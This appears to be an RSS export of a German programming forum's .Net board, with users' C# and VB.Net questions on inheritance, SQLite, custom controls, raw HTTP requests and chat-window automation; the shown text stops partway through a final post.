<a href="http://geekswithblogs.net/danielggarcia/archive/2013/12/22/portable-databases-ii-using-sqlite-with-entity-framework.aspx" target="_blank" rel="nofollow">Portable databases (II): using SQLite with Entity Framework</a><br />
<a href="http://erikej.blogspot.de/2014/11/using-sqlite-with-entity-framework-6.html" target="_blank" rel="nofollow">Everything SQL Server Compact: Using SQLite with the Entity Framework 6.1.x designer - a troubleshooting guide</a><br />
<br />
Keinen Dunst was die Verarsche soll, ich mache es genau so wie in der Anleitung, hab jetzt 8 Testprojekte erstelt und meinen Pc mindestens so oft neu gestartet die Scheisse geht einfach <u><i><b>NICHT</b></i></u>! ;(</div>


	<div style="padding:10px">

	

	
		<fieldset class="fieldset">
			<legend>Angehängte Grafiken</legend>
				<div style="padding:10px">
				<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=8790&amp;stc=1&amp;d=1428272599" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=8791&amp;stc=1&amp;d=1428272781" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>The Dope Show</dc:creator>
			<guid isPermaLink="true">net-94/sqlite-in-c-36766</guid>
		</item>
		<item>
			<title>C# Abstraktes UND statisches Attribut?!</title>
			<link>net-94/abstraktes-statisches-attribut-36622?goto=newpost</link>
			<pubDate>Sun, 15 Mar 2015 15:44:07 GMT</pubDate>
			<description>Hey, 
 
ich habe mehrere Klassen die von einer Basisklasse erben. Jede Klasse soll einen String mit dem Namen haben. Das könnte ich nun ja ganz...</description>
			<content:encoded><![CDATA[<div>Hey,<br />
<br />
ich habe mehrere Klassen die von einer Basisklasse erben. Jede Klasse soll einen String mit dem Namen haben. Das könnte ich nun ja ganz simple mit einem Attribute machen: <br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
abstract class BaseClass<br />
    {<br />
        public abstract string Name<br />
        {<br />
            get;<br />
        }<br />
    }<br />
<br />
    class Example : BaseClass<br />
    {<br />
        public override string Name<br />
        {<br />
            get<br />
            {<br />
                return &quot;Test&quot;;<br />
            }<br />
        }<br />
    }<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
In meinem Programm erzeuge ich dann ein Array und durchlaufe es mit einer Schleife<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
List&lt;BaseClass&gt; myList = new List&lt;BaseClass&gt;();<br />
            myList.Add(new Example());<br />
            myList.Add(new Example2());<br />
            ...<br />
            foreach (BaseClass item in myList)<br />
            {<br />
                MessageBox.Show(item.Name);<br />
            }<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Das finde ich aber Leistungsverschwendung, weil es so ist: Ich brauche nur eine Instanz der Klassen, man soll aber anhand der Namen wählen können welche davon genutzt wird. Ich brauche also ein statisches Attribut damit ich keine unnötige Instanz erzeugen muss und brauche einen Array der Klassen annimmt ohne dass ich ein Objekt aus ihnen erzeugt habe. <br />
<br />
Es fängt schon beim ersten an: Anscheinend kann man keine abstrakten Klassen mit statischen Attributen erzeugen! Verstehe ich absolut nicht wieso das nicht mögich sein soll. Es wird zwar kein Objekt erzeugt aber wieso kann ich nicht ein Muster festlegen, welche Attribute/Methoden eine Klasse haben muss, die kein Objekt ist? <br />
<br />
Um es mal Code zu zeigen, genau das suche ich, funktioniert aber so nicht: <br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
abstract class BaseClass<br />
    {<br />
        public abstract static string Name<br />
        {<br />
            get;<br />
        }<br />
    }<br />
<br />
    class Example : BaseClass<br />
    {<br />
        public override static string Name<br />
        {<br />
            get<br />
            {<br />
                return &quot;Test&quot;;<br />
            }<br />
        }<br />
    }<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Meine Vermutung ist, dass Vererbung immer an ein Objekt gebunden ist =&gt; Wo kein Objekt ist kann man also nichts vererben, anders macht das für mich keinen Sinn. Nur welchen Weg gibt es eine Klasse dazu zu zwingen, ein statisches Attribut zu besitzen? Das muss doch irgendwie gehen? -.-</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>The Dope Show</dc:creator>
			<guid isPermaLink="true">net-94/abstraktes-statisches-attribut-36622</guid>
		</item>
		<item>
			<title>C# Abstrakte Klasse mit Konstruktor - Alternative?</title>
			<link>net-94/abstrakte-klasse-mit-konstruktor-alternative-36589?goto=newpost</link>
			<pubDate>Wed, 11 Mar 2015 22:13:10 GMT</pubDate>
			<description>Hallo, 
 
ich habe eine abstrakte Klasse, von der ein paar andere Klassen erben. Diese abstrakte Klasse soll einen Konstruktor haben, der bei jeder...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
ich habe eine abstrakte Klasse, von der ein paar andere Klassen erben. Diese abstrakte Klasse soll einen Konstruktor haben, der bei jeder Klasse die davon erbt auch aufgerufen wird. <br />
Vereinfacht sollte das so aussehen:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
public abstract class Person <br />
{<br />
    private string name;<br />
    public Person(string personName) <br />
    {<br />
        name = personName;<br />
    }<br />
<br />
    public string Name <br />
    {<br />
        get <br />
        {<br />
            return name;<br />
        }<br />
    }<br />
    public string Age {get;set;}<br />
}<br />
<br />
public class Student : Person <br />
{<br />
    <br />
}<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Ziel der Sache ist, dass ich die Klasse &quot;Student&quot; nun mit dem Konstruktor von &quot;Person&quot; aufrufen kann, also so:<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
Student max = new Student(&quot;Max&quot;);<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Ich habe in der msdn auf <a href="https://msdn.microsoft.com/de-de/library/ms182126.aspx" target="_blank" rel="nofollow">https://msdn.microsoft.com/de-de/library/ms182126.aspx</a> gelesen, dass das so nicht erlaubt ist.<br />
Die Alternative wäre, dass ich das Attribute in jeder meiner erbenden Klassen einbinde, also <br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
public abstract class Person <br />
{<br />
    public string Age {get;set;}<br />
}<br />
<br />
public class Student : Person <br />
{<br />
    private string name;<br />
    public Student(string studentName) <br />
    {<br />
        name = studentName;<br />
    }<br />
    public string Name <br />
    {<br />
        get <br />
        {<br />
            return name;<br />
        }<br />
    }<br />
}<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
Dann muss ich das aber in jeder erbenden Klasse einbinden, das finde ich lästig und fehleranfällig. Gibt es echt keinen anderen Weg wie man das lösen kann? <br />
Ich möchte halt dass eine Funktion der abstrakten Klasse bei jeder Klasse die davon erbt im Konstruktor aufgerufen wird, und zwar möglichst automatisch.<br />
Vielleicht ist hier ein Guru der weiß was zu tun ist :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Fitty</dc:creator>
			<guid isPermaLink="true">net-94/abstrakte-klasse-mit-konstruktor-alternative-36589</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net [2010] Bei Speicherung automatisch Datum anlegen]]></title>
			<link>net-94/2010-bei-speicherung-automatisch-datum-anlegen-36567?goto=newpost</link>
			<pubDate>Mon, 09 Mar 2015 01:07:36 GMT</pubDate>
			<description>Hallöle, habe ein Programm geschrieben wo ich einige Felder beschreiben und mit einem klick speichern kann. 
Neben dem Speichern Button kommt nun ein...</description>
			<content:encoded><![CDATA[<div>Hallöle, habe ein Programm geschrieben wo ich einige Felder beschreiben und mit einem klick speichern kann.<br />
Neben dem Speichern Button kommt nun ein Feld hin wo immer das letzte Datum stehen soll wann es zuletzt gespeichert wurde. Doch wie stelle ich das am sinnvollsten an? Mit der Textbox kann ich nicht viel erreichen, mit der Datumsanzeige aber auch nicht.. :facepalm:</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>ElkosMED</dc:creator>
			<guid isPermaLink="true">net-94/2010-bei-speicherung-automatisch-datum-anlegen-36567</guid>
		</item>
		<item>
			<title>C# Rand entfernen?</title>
			<link>net-94/rand-entfernen-36443?goto=newpost</link>
			<pubDate>Mon, 23 Feb 2015 07:40:18 GMT</pubDate>
			<description><![CDATA[^Topic 
 
Ich hab's schon mit 
Me.TransparencyKey = BackColor 
versucht. 
Bild: https://u-img.net/img/3196It.png  
Wie entferne ich diese richtig?]]></description>
			<content:encoded><![CDATA[<div>^Topic<br />
<br />
Ich hab's schon mit<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
Me.TransparencyKey = BackColor
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
versucht.<br />
<img src="https://u-img.net/img/3196It.png" border="0" alt="" /><br />
Wie entferne ich diese richtig?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>ZarneXxX</dc:creator>
			<guid isPermaLink="true">net-94/rand-entfernen-36443</guid>
		</item>
		<item>
			<title>VB.Net Numbered RichTextBox</title>
			<link>net-94/numbered-richtextbox-36358?goto=newpost</link>
			<pubDate>Sat, 14 Feb 2015 09:09:50 GMT</pubDate>
			<description>Hey, 
bin vorhin auf dieses Snippet (http://www.codeproject.com/Articles/12152/Numbering-lines-of-RichTextBox-in-NET) gestoßen und habs mal mit ein...</description>
			<content:encoded><![CDATA[<div>Hey,<br />
bin vorhin auf <a href="http://www.codeproject.com/Articles/12152/Numbering-lines-of-RichTextBox-in-NET" target="_blank" rel="nofollow">dieses Snippet</a> gestoßen und habs mal mit ein paar<br />
kleinen Änderungen in VB übersetzt:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
    'RTBContent line count<br />
    Dim lineCount As Integer = Nothing<br />
<br />
    Private Sub setLineNumbers()<br />
        'Set line count<br />
        lineCount = RTBContent.Lines.Count<br />
<br />
        'Get first visible(!) line<br />
        Dim firstCharIndex As Integer = RTBContent.GetCharIndexFromPosition(New Point(0, 0))<br />
        Dim firstLineIndex As Integer = RTBContent.GetLineFromCharIndex(firstCharIndex)<br />
<br />
        'Get last visible(!) line<br />
        Dim lastCharIndex As Integer = RTBContent.GetCharIndexFromPosition(New Point(RTBContent.Width, RTBContent.Width))<br />
        Dim lastLineIndex As Integer = RTBContent.GetLineFromCharIndex(lastCharIndex)<br />
<br />
        'Clear numbers<br />
        RTBNumbers.Clear()<br />
<br />
        'Set numbers<br />
        For n As Integer = firstLineIndex To lastLineIndex + 1<br />
            RTBNumbers.AppendText(n &amp; vbCrLf)<br />
        Next<br />
    End Sub<br />
<br />
    'Event -&gt; RTBContent TexChanged -&gt; Set numbers if lineCount has changed<br />
    Private Sub RTBContent_TextChanged(sender As Object, e As EventArgs) Handles RTBContent.TextChanged<br />
        If Not RTBContent.Lines.Count = lineCount Then<br />
            setLineNumbers()<br />
        End If<br />
    End Sub<br />
<br />
    'Event -&gt; RTBContent VScroll -&gt; Set numbers<br />
    Private Sub RTBContent_VScroll(sender As Object, e As EventArgs) Handles RTBContent.VScroll<br />
        setLineNumbers()<br />
    End Sub<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Das ganze funktioniert zwar sehr schön aber irgendwie frage ich mich ob es für das Ganze nicht eine &quot;zeitgemäßere&quot; Lösung gibt da<br />
das Sample noch unter .NET 2.0 geschrieben wurde. <br />
<br />
Habe bereits gegoogelt aber was aktuelles zu diesem Thema konnte ich leider nicht finden...<br />
<br />
MfG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>exception</dc:creator>
			<guid isPermaLink="true">net-94/numbered-richtextbox-36358</guid>
		</item>
		<item>
			<title>VB.Net rappers.in beats grabben</title>
			<link>net-94/rappers-in-beats-grabben-35943?goto=newpost</link>
			<pubDate>Sun, 04 Jan 2015 14:50:02 GMT</pubDate>
			<description>Hoi, 
 
Ich habe folgendes problem undzwar würde ich gerne die ganzen rappers.in beats grabben/downloaden ich habe die linkliste berreits fertig kann...</description>
			<content:encoded><![CDATA[<div>Hoi,<br />
<br />
Ich habe folgendes problem undzwar würde ich gerne die ganzen rappers.in beats grabben/downloaden ich habe die linkliste berreits fertig kann sie allerdings nicht runterladen und bei diesem part brauch ich hilfe.<br />
<br />
Beatlink beispiel:<br />
<a href="https://www.rappers.in/beatdownload.php?bid=173835" target="_blank" rel="nofollow">https://www.rappers.in/beatdownload.php?bid=173835</a></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/rappers-in-beats-grabben-35943</guid>
		</item>
		<item>
			<title>VB.Net TCP HTTP 1.1 Problem</title>
			<link>net-94/tcp-http-1-1-problem-35910?goto=newpost</link>
			<pubDate>Fri, 02 Jan 2015 02:06:52 GMT</pubDate>
			<description><![CDATA[Hi, 
 
vielleicht kannst du mir nochmal helfen 
 
ich hab mir jetzt folgende funktion mehr oder weniger C&P't: 
 
 
Code: 
--------- 
server =...]]></description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
vielleicht kannst du mir nochmal helfen<br />
<br />
ich hab mir jetzt folgende funktion mehr oder weniger C&amp;P't:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">server = &quot;fb-genius.com&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim ascii As Encoding = Encoding.ASCII<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim request As String = _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &quot;GET /ScriptsAndTricks.aspx HTTP/1.1&quot; &amp; ControlChars.Cr + ControlChars.Lf &amp; _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &quot;Host: &quot; &amp; server &amp; ControlChars.Cr + ControlChars.Lf &amp; _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &quot;User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0&quot; &amp; ControlChars.Cr + ControlChars.Lf &amp; _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &quot;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&quot; &amp; ControlChars.Cr + ControlChars.Lf &amp; _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &quot;Accept-Language: de,en-US;q=0.7,en;q=0.3&quot; &amp; ControlChars.Cr + ControlChars.Lf &amp; _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &quot;Connection: Close&quot; &amp; ControlChars.Cr + ControlChars.Lf + ControlChars.Cr + ControlChars.Lf<br />
&nbsp; &nbsp; &nbsp; &nbsp; MsgBox(request)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim bytesSent As [Byte]() = ascii.GetBytes(request)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim bytesReceived(255) As [Byte]<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim s As Socket = ConnectSocket(server, port)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; If s Is Nothing Then<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Return &quot;Connection failed&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; End If<br />
&nbsp; &nbsp; &nbsp; &nbsp; s.Send(bytesSent, bytesSent.Length, 0)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim bytes As Int32<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim page As [String] = &quot;Default HTML page on &quot; + server + &quot;:&quot; + ControlChars.Cr + ControlChars.Lf<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Do<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; bytes = s.Receive(bytesReceived, bytesReceived.Length, 0)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; page = page + Encoding.ASCII.GetString(bytesReceived, 0, bytes)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Loop While bytes &gt; 0<br />
&nbsp; &nbsp; &nbsp; &nbsp; MsgBox(page)</code><hr />
</div><br />
<br />
das funktioniert auch alles so weit,<br />
aber wenn ich den server auf <a href="http://www.facebook.com" target="_blank" rel="nofollow">www.facebook.com</a> wechseln will und beispielsweise die GET funktion zu<br />
&quot;GET /r.php HTTP/1.1&quot; änder, dann krig ich immer die Antwort:<br />
<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			HTTP/1.1 302 Found<br />
Location: <a href="https://www.facebook.com/r.php" target="_blank" rel="nofollow">https://www.facebook.com/r.php</a><br />
X-Content-Type-Options: nosniff<br />
P3P: CP=&quot;Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p&quot;<br />
Set-Cookie: datr=jfqlVKfAmvuCcFRMSnaXO85m; expires=Sun, 01-Jan-2017 01:55:25 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly<br />
Content-Type: text/html; charset=utf-8<br />
X-FB-Debug: 12/75a5W5PY4f+55von/OEcq29dH3XrJAnG/9sXQJ4/gnRxsZMzuaLOLEusFYKBdkPlAedZDA+EndPFp+j1CyQ==<br />
Date: Fri, 02 Jan 2015 01:55:25 GMT<br />
Connection: close<br />
Content-Length: 0
			
		<hr />
	</div>
</div><br />
Ich möchte das ganze gerne auf TCP basis machen, damit ich socksproxys benutzen kann...<br />
<br />
was ist mein Fehler? :)<br />
warum bekomme ich immer ne Content-Length von 0?<br />
<br />
Liebe Grüße<br />
Baumstumpf</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Baumstumpf</dc:creator>
			<guid isPermaLink="true">net-94/tcp-http-1-1-problem-35910</guid>
		</item>
		<item>
			<title>VB.Net Knuddels TextBox (Java Basis)</title>
			<link>net-94/knuddels-textbox-java-basis-35906?goto=newpost</link>
			<pubDate>Thu, 01 Jan 2015 21:57:51 GMT</pubDate>
			<description>Hallo.. 
 
Und zwar geht es um die Knuddels TextBox, die man im Javachat Knuddels (http://www.knuddels.de/alterlogin.html) hat. 
 
Ich bekomme zwar...</description>
			<content:encoded><![CDATA[<div>Hallo..<br />
<br />
Und zwar geht es um die Knuddels TextBox, die man im <a href="http://www.knuddels.de/alterlogin.html" target="_blank" rel="nofollow">Javachat Knuddels</a> hat.<br />
<br />
Ich bekomme zwar Text in die Textbox gesendet, dieser wird aber nicht in den Chat gesendet.<br />
Bis vor ein paar Monaten hat das noch mit dem alten Code den ich hatte funktioniert,<br />
jetzt haben die es anscheinend wieder geändert.<br />
<br />
Kann mir da jemand was zu sagen?<br />
<br />
<br />
<br />
 <script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
Class KnuddelsJavaTextBox<br />
        &lt;DllImport(&quot;User32.Dll&quot;)&gt; Private Shared Function FindWindow(lpClassName As String, lpWindowName As String) As IntPtr<br />
        End Function<br />
        &lt;DllImport(&quot;User32.Dll&quot;)&gt; Private Shared Function FindWindowEx(parentHandle As IntPtr, childAfter As IntPtr, className As String, windowTitle As IntPtr) As IntPtr<br />
        End Function<br />
        &lt;DllImport(&quot;User32.Dll&quot;)&gt; Private Shared Function SendMessage(hWnd As IntPtr, Msg As UInt32, wParam As IntPtr, lParam As String) As IntPtr<br />
        End Function<br />
        &lt;DllImport(&quot;User32.Dll&quot;)&gt; Private Shared Function SendMessage(hWnd As IntPtr, Msg As Integer, wParam As Integer, lParam As StringBuilder) As Integer<br />
        End Function<br />
        &lt;DllImport(&quot;User32.Dll&quot;)&gt; Private Shared Function PostMessage(hWnd As Integer, msg As UInteger, wParam As UInteger, lParam As Integer) As IntPtr<br />
        End Function<br />
        &lt;DllImport(&quot;User32.Dll&quot;)&gt; Private Shared Function PostMessage(hWnd As Integer, msg As UInteger, wParam As UInteger, lParam As UInteger) As IntPtr<br />
        End Function<br />
        Public Shared Sub Send(Text As String)<br />
            Dim Name As String = String.Empty<br />
            Name = Process.GetProcesses.Single(Function(c) c.MainWindowTitle.Contains(&quot;Channel&quot;)).MainWindowTitle<br />
            Dim Hwndd As IntPtr = FindWindow(&quot;SunAwtFrame&quot;, Name)<br />
            Hwndd = FindWindowEx(Hwndd, IntPtr.Zero, &quot;RichEdit20W&quot;, IntPtr.Zero)<br />
<br />
            SendMessage(Hwndd, CInt(&amp;HC), IntPtr.Zero, Text) 'SETTEXT<br />
            SendMessage(Hwndd, CUInt(&amp;H7), CType(1048576, IntPtr), String.Empty) 'SETFOCUS<br />
            Thread.Sleep(10)<br />
            PostMessage(CInt(Hwndd), CUInt(&amp;H201), &amp;HD, &amp;H1C0001)<br />
            PostMessage(CInt(Hwndd), CUInt(&amp;H202), &amp;HD, &amp;H1C0001)<br />
            PostMessage(CInt(Hwndd), CUInt(&amp;H100), &amp;HD, &amp;H1C0001)<br />
            PostMessage(CInt(Hwndd), CUInt(&amp;H102), &amp;HD, &amp;H1C0001)<br />
            Thread.Sleep(10)<br />
            PostMessage(CInt(Hwndd), CUInt(&amp;H101), CUInt(&amp;HD), CUInt(&amp;HC01C0001UI))<br />
            SendMessage(Hwndd, CUInt(&amp;H8), CType(1048576, IntPtr), String.Empty)<br />
<br />
        End Sub<br />
    End Class
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Aufruf:  <script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
KnuddelsJavaTextBox.Send(&quot;Hallo&quot;)
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/knuddels-textbox-java-basis-35906</guid>
		</item>
		<item>
			<title>C# Memoryleak - Disposing falsch?</title>
			<link>net-94/memoryleak-disposing-falsch-35729?goto=newpost</link>
			<pubDate>Wed, 17 Dec 2014 17:08:18 GMT</pubDate>
			<description>Hallo. 
 
Und zwar habe ich ein riesiges Memoryleak in meiner Library. Ich benutze mehrere Controls 
meiner selbstgeschriebenen Library in einer...</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Und zwar habe ich ein riesiges Memoryleak in meiner Library. Ich benutze mehrere Controls<br />
meiner selbstgeschriebenen Library in einer WinForm.<br />
<br />
Sofern ich die Tabpages wechsele, steigt der RAM Verbrauch nach zwei drei mal<br />
hin &amp; her switchen der Tabpage auf 150 MB!<br />
<br />
Hier ein Beispiel für ein Control:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
&#91;DefaultEvent(&quot;Click&quot;)&#93;public class MangoEGroupBox : ContainerControl<br />
{<br />
<br />
    private int h_Height = 10;<br />
<br />
    &#91;Browsable(true), DesignerSerializationVisibility(DesignerSerializationVisibility.Visible)&#93;<br />
    public int HeaderHeight<br />
    {<br />
        get { return h_Height; }<br />
        set<br />
        {<br />
            if (h_Height == value || h_Height &lt; 1 || h_Height &lt; 5) return;<br />
            h_Height = value;<br />
            this.Invalidate();<br />
        }<br />
    }<br />
<br />
    public MangoEGroupBox()<br />
    {<br />
        this.SetStyle(ControlStyles.AllPaintingInWmPaint | ControlStyles.OptimizedDoubleBuffer | ControlStyles.UserPaint | ControlStyles.ResizeRedraw | ControlStyles.SupportsTransparentBackColor | ControlStyles.FixedHeight, true);<br />
        this.UpdateStyles();<br />
        this.Size = new Size(200, 100);<br />
        this.BackColor = Color.Transparent;<br />
    }<br />
<br />
<br />
    protected override void OnPaint(System.Windows.Forms.PaintEventArgs e)<br />
    {<br />
        using (Bitmap B = new Bitmap(Width, Height))<br />
        {<br />
            using (Graphics G = Graphics.FromImage(B))<br />
            {<br />
                Rectangle TopBar = new Rectangle(0, 0, Width - 1, HeaderHeight);<br />
                Rectangle box = new Rectangle(0, 0, Width - 1, Height - 10);<br />
<br />
               <br />
<br />
                base.OnPaint(e);<br />
<br />
                G.SmoothingMode = SmoothingMode.HighQuality;<br />
<br />
<br />
<br />
                using(LinearGradientBrush bodygrade = new LinearGradientBrush(ClientRectangle, Color.White, Color.White, 120)){G.FillPath(bodygrade, Draw.RoundRectF(new Rectangle(0, 12, Width - 1, Height - 15), 1));}<br />
                <br />
<br />
                using(LinearGradientBrush outerBorder = new LinearGradientBrush(ClientRectangle, Color.FromArgb(50, 50, 50), Color.DimGray, 90)){G.DrawPath(new Pen(outerBorder), Draw.RoundRectF(new Rectangle(0, 12, Width - 1, Height - 15), 1));}<br />
               <br />
<br />
                using(LinearGradientBrush lbb = new LinearGradientBrush(TopBar, Color.FromArgb(87, 86, 81), Color.FromArgb(60, 59, 55), 90)){G.FillPath(lbb, Draw.RoundRectF(TopBar, 1));}<br />
                <br />
                using(SolidBrush sb = new SolidBrush(Color.FromArgb(50,50,50)))<br />
                {<br />
                    using(Pen pe = new Pen(sb)){G.DrawPath(pe, Draw.RoundRectF(TopBar, 2));}<br />
                }<br />
          <br />
               <br />
                Font drawFont = new Font(&quot;Tahoma&quot;, (HeaderHeight / 2) + 3, FontStyle.Regular);<br />
                G.TextRenderingHint = System.Drawing.Text.TextRenderingHint.ClearTypeGridFit;<br />
<br />
                using(SolidBrush sb = new SolidBrush(Color.White)) {G.DrawString(Text, drawFont, sb, TopBar, new StringFormat { Alignment = StringAlignment.Center, LineAlignment = StringAlignment.Center });}<br />
             <br />
                e.Graphics.DrawImage((Image)B.Clone(), 0, 0);<br />
            }<br />
        }<br />
    }<br />
<br />
    void Dispose()<br />
    {<br />
        Dispose(true);<br />
        // Suppress finalization.<br />
        GC.SuppressFinalize(this);<br />
    }<br />
}
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Stimmt da etwas mit dem Dispose nicht?<br />
<br />
Evtl. kann ich mal den Gesamtcode hochladen (aller Controls)  auf Pastebin. Vllt. mag sich das ja mal jemand ansehen.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/memoryleak-disposing-falsch-35729</guid>
		</item>
		<item>
			<title>VB.Net Httpwebrequest mit JScripts?</title>
			<link>net-94/httpwebrequest-mit-jscripts-35627?goto=newpost</link>
			<pubDate>Mon, 08 Dec 2014 15:32:01 GMT</pubDate>
			<description>Hallo 
 
Ich habe zwei Probleme die mit dem selben Thema zutun haben: 
 
Problem 1: 
Ich möchte mich via postrequest auf einer Seite einloggen aber...</description>
			<content:encoded><![CDATA[<div>Hallo<br />
<br />
Ich habe zwei Probleme die mit dem selben Thema zutun haben:<br />
<br />
Problem 1:<br />
